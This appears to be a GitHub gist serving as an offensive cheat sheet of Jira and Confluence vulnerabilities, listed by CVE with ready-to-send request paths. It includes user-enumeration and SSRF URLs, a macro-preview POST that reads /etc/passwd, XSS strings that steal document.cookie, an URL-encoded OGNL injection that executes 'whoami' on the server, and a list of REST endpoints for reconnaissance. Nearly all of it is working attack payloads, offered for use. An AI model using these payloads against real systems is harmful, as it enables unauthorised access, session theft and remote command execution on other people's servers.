@BigCr0C
Last active November 14, 2023 18:15
common jira vulnerabilities
=== Most common Jira vulnerabilities ===
CVE-2019-8449 User enumeration: /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
>>==============================<<
CVE-2019-8451 SSRF: /plugins/servlet/gadgets/makeRequest?url=https://victimhost:1337@example.com
>>==============================<<
CVE-2019-11581 RCE: /secure/ContactAdministrators!default.jspa
>>==============================<<
CVE-2019-3396 RCE: POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: JIRA ...
{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler(.)com/v/23464dc5","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}
>>==============================<<
CVE-2018-20824 XSS: /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
>>==============================<<
CVE-2020-14181 User enumeration: /ViewUserHover.jspa?username=Admin
>>==============================<<
CVE-2017-9506 SSRF: /plugins/servlet/oauth/users/icon-uri?consumerUri=http:/example.com
>>==============================<<
CVE-2019-3403 Information disclosure: rest/rest/api/2/user/picker
>>==============================<<
CVE-2019-8442 META-INF directory: /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
>>==============================<<
CVE-2019-3402 XSS: /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search
ConfigurePortalPages.jspa
>>==============================<<
CVE-2018-20824 XSS: /plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true
=== Popular Dashboards and Filters ===
Dashboards: /rest/api/2/dashboard?maxResults=100
>>==============================<<
Popular Filters: /secure/ManageFilters.jspa?filter=popular&filterView=popular
=== XSS ===
XSS: /pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%22%3E.vm
>>==============================<<
/secure/QueryComponent!Default.jspa (info)
/plugins/servlet/oauth/users/icon-uri?consumerUri= (SSRF/OPEN redirect)
/cgi-bin/printenv.pl (info)
/pages/createpage-entervariables.action?spacekey=x (RCE)
/%24%7b%28%23a%3d%40org.apache.commons.io.ioutils%40tostring%28%40java.lang.runtime%40getruntime%28%29.exec%28%22whoami%22%29.getinputstream%28%29%2c%22utf-8%22%29%29.%28%40com.opensymphony.webwork.servletactioncontext%40getresponse%28%29.setheader%28%22x-cmd-response%22%2c%23a%29%29%7d/ (RCE)
Endpoints:
/rest/api/2/issueLinkType
/rest/api/2/priority
/rest/api/2/projectCategory
/rest/api/2/resolution
/rest/api/2/status
/rest/api/2/statuscategory
/rest/api/2/projectvalidate/key?key=
/rest/api/2/jql/autocompletedata/
/rest/api/1.0/issues/14101/ActionsAndOperations
/rest/api/2/search
/rest/api/latest/avatar/project/system
/rest/api/2/user/assignable/multiProjectSearch?query=query&projectKeys=
/rest/gadget/1.0/createdVsResolved/generate
/rest/config/1.0/directory
/rest/menu/latest/appswitcher
/rest/menu/latest/admin
/rest/menu/latest/home
/rest/menu/latest/profile